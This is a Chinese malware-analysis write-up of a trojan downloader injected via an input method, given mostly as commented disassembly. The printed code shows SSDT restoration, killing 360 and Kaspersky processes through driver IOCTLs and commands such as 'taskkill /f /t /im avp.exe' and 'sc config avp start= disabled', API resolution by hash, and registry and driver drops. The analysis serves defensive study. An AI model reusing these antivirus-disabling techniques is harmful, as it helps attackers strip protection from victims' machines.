.text:100018BC lea eax, [ecx+eax+MODULES.smi.ImageName] ; 得到内核模块名
在用户进程中加载一个内核副本,搜索内核的副本并得到KeServiceDescriptorTable的RVA地址
.text:100018C1 push 1 ; dwFlags
.text:100018C3 push edi ; hFile
.text:100018C4 push eax ; lpLibFileName
.text:100018C5 call LoadLibraryExA ; 加载内核副本
.text:100018CB mov esi, eax
.text:100018CD test esi, esi
.text:100018CF mov [ebp+hKernel], esi
.text:100018D2 jz Ret
.text:100018D8 nop
.text:100018D9 mov edx, [ebp+pModules]
.text:100018DC push edx ; hMem
.text:100018DD call GlobalFree
.text:100018E3 push offset ProcName ; "KeServiceDescriptorTable"
.text:100018E8 push esi ; hModule
.text:100018E9 call ebx ; GetProcAddress
.text:100018EB test eax, eax
.text:100018ED jz short Ret ; 失败跳走
.text:100018EF sub eax, esi ; 得到KeServiceDescriptorTable RAV地址
.text:100018F1 push eax
.text:100018F2 push esi
.text:100018F3 call FindKiServiceTable
通过内核副本的原始数据发送控制码恢复SSDT
.text:1000192B mov ebx, [eax]
.text:1000192D mov edx, [ebp+hKernelBase]
.text:10001930 sub ecx, ebx
.text:10001932 lea eax, [ebp+ulAddr]
.text:10001935 add ecx, edx
.text:10001937 push eax ; pulAddr
.text:10001938 mov [ebp+ulAddr], ecx
.text:1000193B mov ecx, [ebp+hDriver]
.text:1000193E push edi ; dwServices
.text:1000193F push ecx ; hDriver
.text:10001940 call SetProc ; 除了Hash值获取函数地址其他的
.text:10001940 ; 都是COPY来的一字未改的代码
.text:10001945 mov edx, [ebp+poh]
.text:10001948 mov ecx, [esi+4]
.text:1000194B add esi, 4
.text:1000194E mov ebx, ecx
.text:10001950 sub ebx, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001953 lea eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001956 add esp, 0Ch
.text:10001959 inc edi
.text:1000195A cmp ebx, [edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
.text:1000195D jb short loc_1000192B
.text:1000195F
进入call Kill360Safe看看
下面的废话不多说,建立进程快照遍历进程获取360tray.exe与Zhudongfangyu.exe的进程ID,并把进程ID通过调用DeviceIoControl来结束安全软件进程
.text:100024C8 mov [ebp+sz360tray_exe], '3' ; 生成字符串"360tray.exe"
.text:100024CC mov [ebp+sz360tray_exe+1], '6'
.text:100024D0 mov [ebp+sz360tray_exe+2], '0'
.text:100024D4 mov [ebp+sz360tray_exe+3], 't'
.text:100024D8 mov [ebp+sz360tray_exe+4], 'r'
.text:100024DC mov [ebp+sz360tray_exe+5], 'a'
.text:100024E0 mov [ebp+sz360tray_exe+6], 'y'
.text:100024E4 mov [ebp+sz360tray_exe+7], '.'
.text:100024E8 mov [ebp+sz360tray_exe+8], al
.text:100024EB mov [ebp+sz360tray_exe+9], 'x'
.text:100024EF mov [ebp+sz360tray_exe+0Ah], al
.text:100024F2 mov [ebp+sz360tray_exe+0Bh], 0
.text:100024F6 mov [ebp+szZhudongfangyu_exe], 'z' ; 生成字符串"Zhudongfangyu.exe"
.text:100024FA mov [ebp+szZhudongfangyu_exe+1], 'h'
.text:100024FE mov [ebp+szZhudongfangyu_exe+2], bl
.text:10002501 mov [ebp+szZhudongfangyu_exe+3], 'd'
.text:10002505 mov [ebp+szZhudongfangyu_exe+4], 'o'
.text:10002509 mov [ebp+szZhudongfangyu_exe+5], dl
.text:1000250C mov [ebp+szZhudongfangyu_exe+6], cl
.text:1000250F mov [ebp+szZhudongfangyu_exe+7], 'f'
.text:10002513 mov [ebp+szZhudongfangyu_exe+8], 'a'
.text:10002517 mov [ebp+szZhudongfangyu_exe+9], dl
.text:1000251A mov [ebp+szZhudongfangyu_exe+0Ah], cl
.text:1000251D mov [ebp+szZhudongfangyu_exe+0Bh], 'y'
.text:10002521 mov [ebp+szZhudongfangyu_exe+0Ch], bl
.text:10002524 mov [ebp+szZhudongfangyu_exe+0Dh], '.'
.text:10002528 mov [ebp+szZhudongfangyu_exe+0Eh], al
.text:1000252B mov [ebp+szZhudongfangyu_exe+0Fh], 'x'
.text:1000252F mov [ebp+szZhudongfangyu_exe+10h], al
.text:10002532 mov [ebp+szZhudongfangyu_exe+11h], 0
.text:10002536 call CreateToolhelp32Snapshot
.text:1000253B mov esi, eax
.text:1000253D mov [ebp+pe.dwSize], 128h
.text:10002547 push eax
.text:10002548 nop
.text:10002549 pop eax
.text:1000254A lea eax, [ebp+pe]
.text:10002550 push eax ; lppe
.text:10002551 push esi ; hSnapshot
.text:10002552 call Process32First
.text:10002557 test eax, eax
.text:10002559 jz short loc_100025C4
.text:1000255B mov edi, [ebp+arg_0]
.text:1000255E mov ebx, lstrcmpiA
.text:10002564
.text:10002564 loc_10002564: ; CODE XREF: Kill360Safe+112j
.text:10002564 lea ecx, [ebp+sz360tray_exe]
.text:10002567 lea edx, [ebp+pe.szExeFile]
.text:1000256D push ecx ; lpString2
.text:1000256E push edx ; lpString1
.text:1000256F call ebx ; lstrcmpiA ; 比较是否"360tray.exe"进程
.text:10002571 test eax, eax
.text:10002573 jz short loc_10002586
.text:10002575 lea eax, [ebp+szZhudongfangyu_exe]
.text:10002578 lea ecx, [ebp+pe.szExeFile]
.text:1000257E push eax ; lpString2
.text:1000257F push ecx ; lpString1
.text:10002580 call ebx ; lstrcmpiA ; 比较是否"Zhudongfangyu.exe"进程
.text:10002582 test eax, eax
.text:10002584 jnz short GotoNext
.text:10002586
.text:10002586 loc_10002586: ; CODE XREF: Kill360Safe+C3j
.text:10002586 mov edx, [ebp+pe.th32ProcessID]
.text:1000258C push 82E8173h
.text:10002591 push 1
.text:10002593 mov [ebp+dwProcessID], edx
.text:10002596 call GetProcAddressByHashValue
.text:1000259B 发送控制码结束进程
.text:1000259B lea ecx, [ebp+BytesReturned]
.text:1000259E push 0
.text:100025A0 push ecx
.text:100025A1 push 0
.text:100025A3 push 0
.text:100025A5 lea edx, [ebp+dwProcessID]
.text:100025A8 push 4
.text:100025AA push edx
.text:100025AB push 222004h
.text:100025B0 push edi
.text:100025B1 call eax ; DeviceIoControl
.text:100025B3
.text:100025B3 GotoNext: ; CODE XREF: Kill360Safe+D4j
.text:100025B3 lea eax, [ebp+pe]
.text:100025B9 push eax ; lppe
.text:100025BA push esi ; hSnapshot
.text:100025BB call Process32Next
.text:100025C0 test eax, eax
.text:100025C2 jnz short loc_10002564
.text:100025C4
.text:100025C4 loc_100025C4: ; CODE XREF: Kill360Safe+A9j
.text:100025C4 push 723EB0D5h
.text:100025C9 push 1
.text:100025CB call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100025D0 push esi
.text:100025D1 call eax ; CloseHandle
.text:100025D3 push eax
.text:100025D4 nop
.text:100025D5 pop eax
.text:100025D6 pop edi
.text:100025D7 pop esi
.text:100025D8 xor eax, eax
.text:100025DA pop ebx
.text:100025DB mov esp, ebp
.text:100025DD pop ebp
.text:100025DE retn
.text:100025DE Kill360Safe endp
再进入call KillAvp 看看
1.建立进程快照遍历进程获取进程AVP.EXE的进程ID,并禁用卡巴服务
2.建立卡巴的模块快照再次遍历AVP的模块,并卸载卡巴的以下模块
kavbase.kdl
klavemu.kdl
webav.kdl
kjim.kdl
vlns.kdl
mark.kdl
3.最后"taskkill.exe /f /t /im avp.exe"一个结束进程的批处理做掉卡巴
.text:10002280 call CreateToolhelp32Snapshot
.text:10002285 mov edi, eax
.text:10002287 lea eax, [ebp+pe]
.text:1000228D push eax ; lppe
.text:1000228E push edi ; hSnapshot
.text:1000228F mov [ebp+pe.dwSize], 128h
.text:10002299 call Process32First
.text:1000229E test eax, eax
.text:100022A0 jz loc_100023E9
.text:100022A6 mov ebx, lstrcmpiA
.text:100022AC mov esi, lstrcpyA
.text:100022B2
.text:100022B2 loc_100022B2: ; CODE XREF: KillAvp+2C3j
.text:100022B2 push offset aDys1hH ; "dys1h{h"
.text:100022B7 call DecryString ; 解码后"avp.exe"
.text:100022BC add esp, 4
.text:100022BF lea ecx, [ebp+pe.szExeFile]
.text:100022C5 push eax ; lpString2
.text:100022C6 push ecx ; lpString1
.text:100022C7 call ebx ; lstrcmpiA ; 比较是否"avp.exe"进程
.text:100022C9 test eax, eax
.text:100022CB jnz loc_100023D4 ; 未找到"avp.exe"进程跳走
.text:100022D1 nop
.text:100022D2 push eax
.text:100022D3 push eax
.text:100022D4 lea edx, [ebp+szCMDDisabledAvpService]
.text:100022D7 lea eax, [ebp+SC]
.text:100022DA push edx ; "config avp start= disabled"
.text:100022DB push eax ; "sc"
.text:100022DC push 0
.text:100022DE push 0
.text:100022E0 call lpfnShellExecute ; 禁用卡巴服务
.text:100022E6 push 3D9972F5h
.text:100022EB push 1
.text:100022ED call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100022F2 push 2500
.text:100022F7 call eax ; Sleep
.text:100022F9 nop
.text:100022FA mov edx, [ebp+pe.th32ProcessID]
.text:10002300 lea ecx, [ebp+szKavbase_kdl]
.text:10002303 push ecx ; lpszModuleName
.text:10002304 push edx ; dwProcessId
.text:10002305 call UnloadModule ; 卸载模块
.text:1000230A nop
.text:1000230B mov ecx, [ebp+pe.th32ProcessID]
.text:10002311 lea eax, [ebp+szWebav_kdl]
.text:10002314 push eax ; lpszModuleName
.text:10002315 push ecx ; dwProcessId
.text:10002316 call UnloadModule
.text:1000231B nop
.text:1000231C mov eax, [ebp+pe.th32ProcessID]
.text:10002322 lea edx, [ebp+szVlns_kdl]
.text:10002325 push edx ; lpszModuleName
.text:10002326 push eax ; dwProcessId
.text:10002327 call UnloadModule
.text:1000232C nop
.text:1000232D mov edx, [ebp+pe.th32ProcessID]
.text:10002333 lea ecx, [ebp+szMark_kdl]
.text:10002336 push ecx ; lpszModuleName
.text:10002337 push edx ; dwProcessId
.text:10002338 call UnloadModule
.text:1000233D nop
.text:1000233E mov ecx, [ebp+pe.th32ProcessID]
.text:10002344 lea eax, [ebp+szKlavemu_kdl]
.text:10002347 push eax ; lpszModuleName
.text:10002348 push ecx ; dwProcessId
.text:10002349 call UnloadModule
.text:1000234E nop
.text:1000234F mov eax, [ebp+pe.th32ProcessID]
.text:10002355 lea edx, [ebp+szKjim_kdl]
.text:10002358 push edx ; lpszModuleName
.text:10002359 push eax ; dwProcessId
.text:1000235A call UnloadModule
.text:1000235F add esp, 30h
.text:10002362 push 3D9972F5h
.text:10002367 push 1
.text:10002369 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000236E push 1000
.text:10002373 call eax ; Sleep
.text:10002375 nop
.text:10002376 push offset aWdvnnloo1hH ; "wdvnnloo1h{h"
.text:1000237B call DecryString ; 解密后字符"taskkill.exe"
.text:10002380 add esp, 4
.text:10002383 lea ecx, [ebp+szProcTaskkill_exe]
.text:10002389 push eax ; lpString2
.text:1000238A push ecx ; lpString1
.text:1000238B call esi ; lstrcpyA
.text:1000238D push offset a2i2w2lpDys1hH ; "2i#2w#2lp#dys1h{h"
.text:10002392 call DecryString ; 解密后字符串"/f /t /im avp.exe"
.text:10002397 add esp, 4
.text:1000239A lea edx, [ebp+lpCMDKillAvp]
.text:100023A0 push eax ; lpString2
.text:100023A1 push edx ; lpString1
.text:100023A2 call esi ; lstrcpyA
.text:100023A4 push 0
.text:100023A6 lea eax, [ebp+lpCMDKillAvp]
.text:100023AC push 0
.text:100023AE lea ecx, [ebp+szProcTaskkill_exe]
.text:100023B4 push eax ; "/f /t /im avp.exe"
.text:100023B5 push ecx ; "taskkill.exe"
.text:100023B6 push 0
.text:100023B8 push 0
.text:100023BA call lpfnShellExecute ; 一个处理做掉卡巴
.text:100023C0 push 3D9972F5h
.text:100023C5 push 1
.text:100023C7 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100023CC push 4500
.text:100023D1 call eax ; Sleep
.text:100023D3 nop
.text:100023D4
.text:100023D4 loc_100023D4: ; CODE XREF: KillAvp+1ABj
.text:100023D4 lea edx, [ebp+pe]
.text:100023DA push edx ; lppe
.text:100023DB push edi ; hSnapshot
.text:100023DC call Process32Next
.text:100023E1 test eax, eax
.text:100023E3 jnz loc_100022B2
.text:100023E9
.text:100023E9 loc_100023E9: ; CODE XREF: KillAvp+180j
.text:100023E9 push 723EB0D5h
.text:100023EE push 1
.text:100023F0 call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100023F5 push edi
.text:100023F6 call eax ; CloseHandle
.text:100023F8 push eax
.text:100023F9 nop
.text:100023FA pop eax
.text:100023FB pop edi
.text:100023FC pop esi
.text:100023FD xor eax, eax
.text:100023FF pop ebx
.text:10002400 mov esp, ebp
.text:10002402 pop ebp
.text:10002403 retn
.text:10002403 KillAvp endp
进入 call ImageExecuteFile
依次访问并解码安全软件进程名字符串数组
发送控制码劫持安全软件进程
.text:10001A3F
.text:10001A3F loc_10001A3F: ; CODE XREF: ImageExecuteFile+124j
.text:10001A3F mov ecx, 3Fh
.text:10001A44 xor eax, eax
.text:10001A46 lea edi, [ebp+MultiByteStr]
.text:10001A4C rep stosd
.text:10001A4E stosw
.text:10001A50 stosb
.text:10001A51 nop
.text:10001A52 mov eax, [ebp+lpSafeProcList]
.text:10001A55 mov esi, lstrcpyA
.text:10001A5B lea edx, [ebp+MultiByteStr]
.text:10001A61 mov ecx, [eax] ; 取出一个安全进程命名
.text:10001A63 push ecx ; lpString2
.text:10001A64 push edx ; lpString1
.text:10001A65 call esi ; lstrcpyA
.text:10001A67 nop
.text:10001A68 lea eax, [ebp+MultiByteStr]
.text:10001A6E push eax ; lpString
.text:10001A6F call DecryProcName ; 解密进程名
.text:10001A74 add esp, 4
.text:10001A77 lea ecx, [ebp+MultiByteStr]
.text:10001A7D push eax ; lpString2
.text:10001A7E push ecx ; lpString1
.text:10001A7F call esi ; lstrcpyA ; 复制解密后的字符串
.text:10001A81 nop
.text:10001A82 lea edx, [ebp+szExe]
.text:10001A85 lea eax, [ebp+MultiByteStr]
.text:10001A8B push edx ; lpString2
.text:10001A8C push eax ; lpString1
.text:10001A8D call lstrcatA ; 构建完整的进程名
.text:10001A93 nop
.text:10001A94 push 0 ; cchWideChar
.text:10001A96 push 0 ; lpWideCharStr
.text:10001A98 lea ecx, [ebp+MultiByteStr]
.text:10001A9E push -1 ; cbMultiByte
.text:10001AA0 push ecx ; lpMultiByteStr
.text:10001AA1 push 1 ; dwFlags
.text:10001AA3 push 0 ; CodePage
.text:10001AA5 call MultiByteToWideChar ; 计算出进程名长度
.text:10001AAB lea ebx, [eax+eax] ; 进程名长度*2
.text:10001AAE mov [ebp+WideCharSize], eax
.text:10001AB1 push ebx ; dwBytes
.text:10001AB2 push 40h ; uFlags
.text:10001AB4 call GlobalAlloc ; 分配宽字符进程名的空间
.text:10001ABA mov esi, eax
.text:10001ABC test esi, esi
.text:10001ABE jz short loc_10001B0F ; 分配失败跳走
.text:10001AC0 mov ecx, ebx
.text:10001AC2 xor eax, eax
.text:10001AC4 mov edx, ecx
.text:10001AC6 mov edi, esi
.text:10001AC8 shr ecx, 2
.text:10001ACB rep stosd ; 分配的空间内存清0
.text:10001ACD mov ecx, edx
.text:10001ACF and ecx, 3
.text:10001AD2 rep stosb
.text:10001AD4 mov eax, [ebp+WideCharSize]
.text:10001AD7 lea ecx, [ebp+MultiByteStr]
.text:10001ADD push eax ; cchWideChar
.text:10001ADE push esi ; lpWideCharStr
.text:10001ADF push -1 ; cbMultiByte
.text:10001AE1 push ecx ; lpMultiByteStr
.text:10001AE2 push 1 ; dwFlags
.text:10001AE4 push 0 ; CodePage
.text:10001AE6 call MultiByteToWideChar ; 进程名转换成Unicode字符
.text:10001AEC push 82E8173h
.text:10001AF1 push 1
.text:10001AF3 call GetProcAddressByHashValue ; 获取DeviceIoControl进程地址
.text:10001AF8 发送控制码镜像劫持安全软件进程名
.text:10001AF8 mov ecx, [ebp+hDriver]
.text:10001AFB lea edx, [ebp+BytesReturned]
.text:10001AFE push 0
.text:10001B00 push edx
.text:10001B01 push 0
.text:10001B03 push 0
.text:10001B05 push ebx
.text:10001B06 push esi
.text:10001B07 push 22E140h
.text:10001B0C push ecx
.text:10001B0D call eax ; DeviceIoControl
.text:10001B0F
.text:10001B0F loc_10001B0F: ; CODE XREF: ImageExecuteFile+BEj
.text:10001B0F push esi ; hMem
.text:10001B10 call GlobalFree
.text:10001B16 mov eax, [ebp+lpSafeProcList]
.text:10001B19 add eax, 4
.text:10001B1C cmp eax, offset dword_1000124C
.text:10001B21 mov [ebp+lpSafeProcList], eax
.text:10001B24 jl loc_10001A3F ; 未到进程列表未尾继续循环
输入法注入的木马下载器完全逆向与分析
http://bbs.pediy.com/showthread.php?p=832346#post832346
【操作平台】: XP-SP3
主要行为:
1.释放文件CCtest.inf,CCtest.sys,CCtest.dll,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
2.做掉安全软件进程后,释放XXXXscdXXXX.exe下载大量的木马
3.释放文件tmpacik.tmp干掉还原
母体文件释放了五个文件:3120.reg、
CCtest.inf、CCtest.sys、CCtest.dll、 [用于做掉安全软件]
XXXXscdXXXX.exe(XXX为随机名)、 [下载大量木马]
tmpacik.tmp(dll文件) [用于干掉还原软件]
tmpacik.tmp(dll文件)又释放了文件pcidump.sys
建立互斥体防止多个实例同时运行
.Upack:0041EB94 add esp, 30h
.Upack:0041EB97 ; .Upack:0041EB97
.Upack:0041EBA0 建立互斥体防止多个实例同时运行
.Upack:0041EBA0
.Upack:0041EBA0 loc_41EBA0: ; CODE XREF: start+BFj
.Upack:0041EBA0 push offset Name ; "LDMMOO."
.Upack:0041EBA5 push ebx ; bInitialOwner
.Upack:0041EBA6 push ebx ; lpMutexAttributes
.Upack:0041EBA7 call CreateMutexA
.Upack:0041EBAD call GetLastError
.Upack:0041EBB3 cmp eax, 0B7h
.Upack:0041EBB8 jnz short loc_41EBC1
.Upack:0041EBBA push ebx ; uExitCode
.Upack:0041EBBB call ExitProcess
比对函数的Hash值,获取函数地址
.Upack:0041EC08 call GetSystemDirectoryA
.Upack:0041EC0E push 774393E8h
.Upack:0041EC13 push 1
.Upack:0041EC15 call __GetProcessAddressByHashValue ; GetModuleFileNameA,
.Upack:0041EC15 ; 比对函数的Hash值,获取函数地址
.Upack:0041EC15 ;
.Upack:0041EC1A lea ecx, [ebp+lpszModuleFileName]
.Upack:0041EC20 push esi
.Upack:0041EC21 push ecx
.Upack:0041EC22 push ebx
.Upack:0041EC23 call eax ; GetModuleFileNameA
进入__GetProcessAddressByHashValue看看吧
通过计算函数名的Hash值获取函数地址
.Upack:0041F0AF loc_41F0AF: ; CODE XREF: __GetProcessAddressByHashValue+96j
.Upack:0041F0AF mov ecx, [ebp+nFlag]
.Upack:0041F0B2 test ecx, ecx
.Upack:0041F0B4 jz short JMPAndRet ; Kernel32获取失败跳走
.Upack:0041F0B6 mov eax, [ecx+IMAGE_DOS_HEADER.e_lfanew] ; PE头
.Upack:0041F0B9 mov esi, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress] ; 输出表地址RAV
.Upack:0041F0BD lea edx, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader] ; 取可选头地址
.Upack:0041F0C1 mov eax, [ebp+HashValue]
.Upack:0041F0C4 add esi, ecx ; 输出表地址VA
.Upack:0041F0C6 shr eax, 10h
.Upack:0041F0C9 test ax, ax
.Upack:0041F0CC mov [ebp+lpOptionHeaders], edx
.Upack:0041F0CF jnz short loc_41F0DA
.Upack:0041F0D1 movzx eax, word ptr [ebp+HashValue]
.Upack:0041F0D5 sub eax, [esi+IMAGE_EXPORT_DIRECTORY.Base]
.Upack:0041F0D8 jmp short loc_41F134
.Upack:0041F0DA ; ---------------------------------------------------------------------------
.Upack:0041F0DA
.Upack:0041F0DA loc_41F0DA: ; CODE XREF: __GetProcessAddressByHashValue+10Aj
.Upack:0041F0DA mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
.Upack:0041F0DD mov eax, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
.Upack:0041F0E0 and [ebp+dwIndex], 0 ; 初始化计数器
.Upack:0041F0E4 add ebx, ecx ; ENT,导出名字表地址
.Upack:0041F0E6 add eax, ecx ; EOT,导出序号表地址
.Upack:0041F0E8 cmp [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames], 0 ; 判断按名字导出的是否为0
.Upack:0041F0EC mov [ebp+lpExportTableAddress], eax
.Upack:0041F0EF jbe short loc_41F114 ; 小于等于0跳走
.Upack:0041F0F1 搜索Kernel32的ENT,逐一比较函数名的Hash值
.Upack:0041F0F1
.Upack:0041F0F1 loc_41F0F1: ; CODE XREF: __GetProcessAddressByHashValue+14Dj
.Upack:0041F0F1 mov eax, [ebx] ; 取出一个导出函数名RAV
.Upack:0041F0F3 add eax, [ebp+nFlag] ; 导出函数名VA
.Upack:0041F0F6 push eax ; lpszExportFuncName
.Upack:0041F0F7 call ComputedHashValue ; 计算出函数名的Hash值
.Upack:0041F0FC cmp eax, [ebp+HashValue] ; 对比Hash是否相同
.Upack:0041F0FF pop ecx ; 清栈
.Upack:0041F100 jz short loc_41F126 ; Hash相同证明函数名已经找到
.Upack:0041F102 inc [ebp+dwIndex] ; 计数器加1
.Upack:0041F105 add [ebp+lpExportTableAddress], 2 ; 序号表地址向后移动
.Upack:0041F109 mov eax, [ebp+dwIndex]
.Upack:0041F10C add ebx, 4 ; 移动到下一个导出函数名
.Upack:0041F10F cmp eax, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F112 jb short loc_41F0F1 ; 跳走继续查找下一个函数名
.Upack:0041F114
.Upack:0041F114 loc_41F114: ; CODE XREF: __GetProcessAddressByHashValue+12Aj
.Upack:0041F114 mov eax, [ebp+HashValue]
.Upack:0041F117
.Upack:0041F117 loc_41F117: ; CODE XREF: __GetProcessAddressByHashValue+167j
.Upack:0041F117 mov ecx, [ebp+dwIndex]
.Upack:0041F11A cmp ecx, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F11D jnz short loc_41F12E ; 取出Kernel32基址
.Upack:0041F11F
.Upack:0041F11F JMPAndRet: ; CODE XREF: __GetProcessAddressByHashValue+EFj
.Upack:0041F11F xor eax, eax
.Upack:0041F121 jmp Ret
.Upack:0041F126 ; ---------------------------------------------------------------------------
.Upack:0041F126
.Upack:0041F126 loc_41F126: ; CODE XREF: __GetProcessAddressByHashValue+13Bj
.Upack:0041F126 mov eax, [ebp+lpExportTableAddress]
.Upack:0041F129 movzx eax, word ptr [eax] ; 取出序号
.Upack:0041F12C jmp short loc_41F117
.Upack:0041F12E ; ---------------------------------------------------------------------------
.Upack:0041F12E
.Upack:0041F12E loc_41F12E: ; CODE XREF: __GetProcessAddressByHashValue+158j
.Upack:0041F12E mov ecx, [ebp+nFlag] ; 取出Kernel32基址
.Upack:0041F131 mov edx, [ebp+lpOptionHeaders]
.Upack:0041F134
.Upack:0041F134 loc_41F134: ; CODE XREF: __GetProcessAddressByHashValue+113j
.Upack:0041F134 mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
.Upack:0041F137 lea eax, [ebx+eax*4]
.Upack:0041F13A mov ebx, [eax+ecx] ; 导出函数地址RAV
.Upack:0041F13D add ebx, ecx ; 计算出函数的RVA
.Upack:0041F13F mov eax, ebx ; 得到函数的VA
.Upack:0041F141 sub eax, esi
.Upack:0041F143 cmp eax, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory.Size]
.Upack:0041F146 jnb loc_41F1D8 ; 跳走并返回函数地址
释放文件并Kill大量的安全软件
.Upack:0041ED2D loc_41ED2D: ; CODE XREF: start+24Cj
.Upack:0041ED2D push 6FB89AF0h
.Upack:0041ED32 push 1
.Upack:0041ED34 call __GetProcessAddressByHashValue ; 获取CreateThread地址
.Upack:0041ED39 push ebx
.Upack:0041ED3A push ebx
.Upack:0041ED3B push ebx
.Upack:0041ED3C push offset lpfnThreadProc
.Upack:0041ED41 push ebx
.Upack:0041ED42 push ebx
.Upack:0041ED43 call eax ; CreateThread
.Upack:0041ED45 push 4000
.Upack:0041ED4A call __Sleep
.Upack:0041ED4F ; .Upack:0041ED4F
.Upack:0041ED58
.Upack:0041ED58 loc_41ED58: ; CODE XREF: start+277j
.Upack:0041ED58 call KillSafeSoft ; 释放文件并Kill大量的安全软件
.Upack:0041ED5D mov dword ptr [esp], 7D0h
.Upack:0041ED64 call __Sleep
进入KillSafeSoft
构建临时目录准备释放注册表文件
构建CMD字符串,用CMD命令把注册表文件导入到注册表
[code]
.Upack:0041E7AB 构建临时目录准备释放文件
.Upack:0041E7AB add esp, 18h
.Upack:0041E7AE lea eax, [ebp+lpszRegFileName]
.Upack:0041E7B4 push eax ; lpBuffer
.Upack:0041E7B5 push edi ; nBufferLength
.Upack:0041E7B6 call GetTempPathA
.Upack:0041E7BC mov esi, lstrcat
.Upack:0041E7C2 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7C8 push offset a3120_reg ; "3120.reg"
.Upack:0041E7CD push eax
.Upack:0041E7CE call esi ; lstrcat
.Upack:0041E7D0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7D6 push eax ; lpFileName
.Upack:0041E7D7 call ReleaseRegFile ; 临时目录释放注册表文件"3120.reg"
.Upack:0041E7DC 为导入注册表构建CMD命令
.Upack:0041E7DC lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7E2 mov dword ptr [esp], offset aImport ; "import "
.Upack:0041E7E9 push eax
.Upack:0041E7EA call lstrcpy
.Upack:0041E7F0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7F6 push eax
.Upack:0041E7F7 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7FD push eax
.Upack:0041E7FE call esi ; lstrcat
.Upack:0041E800 push ebx
.Upack:0041E801 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E807 push ebx
.Upack:0041E808 push eax
.Upack:0041E809 push offset aReg_exe ; "reg.exe"
.Upack:0041E80E push offset aOpen ; "open"
.Upack:0041E813 push ebx
.Upack:0041E814 call __ShellExecuteA ; 释放的文件导入到注册表
[/code]
更改"IP 安全策略"服务(PolicyAgent)的启动状态
.Upack:0041E823 push ebx
.Upack:0041E824 lea eax, [ebp+szCMDAuto]
.Upack:0041E827 push ebx
.Upack:0041E828 push eax ; "config PolicyAgent start= auto"
.Upack:0041E829 push offset aSc ; "sc"
.Upack:0041E82E push offset aOpen ; "open"
.Upack:0041E833 push ebx
.Upack:0041E834 call __ShellExecuteA ; 配置"IP 安全策略"服务为自动
.Upack:0041E839 push 7D0h
.Upack:0041E83E call __Sleep
.Upack:0041E843 push ebx
.Upack:0041E844 lea eax, [ebp+szCMDStop]
.Upack:0041E847 push ebx
.Upack:0041E848 push eax ; "stop PolicyAgent"
.Upack:0041E849 push offset aSc ; "sc"
.Upack:0041E84E push offset aOpen ; "open"
.Upack:0041E853 push ebx
.Upack:0041E854 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041E859 add esp, 50h
.Upack:0041E85C push 7D0h
.Upack:0041E861 call __Sleep
.Upack:0041E866 push ebx
.Upack:0041E867 lea eax, [ebp+szCMDStart]
.Upack:0041E86A push ebx
.Upack:0041E86B push eax ; "start PolicyAgent"
.Upack:0041E86C push offset aSc ; "sc"
.Upack:0041E871 push offset aOpen ; "open"
.Upack:0041E876 push ebx
.Upack:0041E877 call __ShellExecuteA ; 开始"IP 安全策略"服务
.Upack:0041E87C push 7D0h
.Upack:0041E881 call __Sleep
删除释放的注册表文件
.Upack:0041E886 lea eax, [ebp+lpszRegFileName]
.Upack:0041E88C push eax
.Upack:0041E88D call __DeleteFileA ; 删除释放的注册表文件
释放文件CCtest.inf,CCtest.sys准备加载驱动
.Upack:0041E93F 构建文件路径,准备释放文件
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.dll"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.sys"
.Upack:0041E93F
.Upack:0041E93F loc_41E93F: ; CODE XREF: KillSafeSoft+650j
.Upack:0041E93F lea eax, [ebp+Buffer]
.Upack:0041E945 push eax
.Upack:0041E946 lea eax, [ebp+InfName]
.Upack:0041E94C push eax
.Upack:0041E94D call edi ; lstrcpy
.Upack:0041E94F lea eax, [ebp+szCCtest_inf]
.Upack:0041E952 push eax
.Upack:0041E953 lea eax, [ebp+InfName]
.Upack:0041E959 push eax
.Upack:0041E95A call esi ; lstrcat
.Upack:0041E95C lea eax, [ebp+Buffer]
.Upack:0041E962 push eax
.Upack:0041E963 lea eax, [ebp+SysName]
.Upack:0041E969 push eax
.Upack:0041E96A call edi ; lstrcpy
.Upack:0041E96C lea eax, [ebp+CCtest_sys]
.Upack:0041E96F push eax
.Upack:0041E970 lea eax, [ebp+SysName]
.Upack:0041E976 push eax
.Upack:0041E977 call esi ; lstrcat
.Upack:0041E979 lea eax, [ebp+Buffer]
.Upack:0041E97F push eax
.Upack:0041E980 lea eax, [ebp+DllName]
.Upack:0041E986 push eax
.Upack:0041E987 call edi ; lstrcpy
.Upack:0041E989 lea eax, [ebp+szCCtest_dll]
.Upack:0041E98C push eax
.Upack:0041E98D lea eax, [ebp+DllName]
.Upack:0041E993 push eax
.Upack:0041E994 call esi ; lstrcat
.Upack:0041E996 ; .Upack:0041E996
.Upack:0041E99F
.Upack:0041E99F loc_41E99F: ; CODE XREF: KillSafeSoft+6B0j
.Upack:0041E99F lea eax, [ebp+InfName]
.Upack:0041E9A5 push eax ; lpszInfFileName
.Upack:0041E9A6 call ReleaseInfFile ; 释放文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E9AB test al, al
.Upack:0041E9AD pop ecx
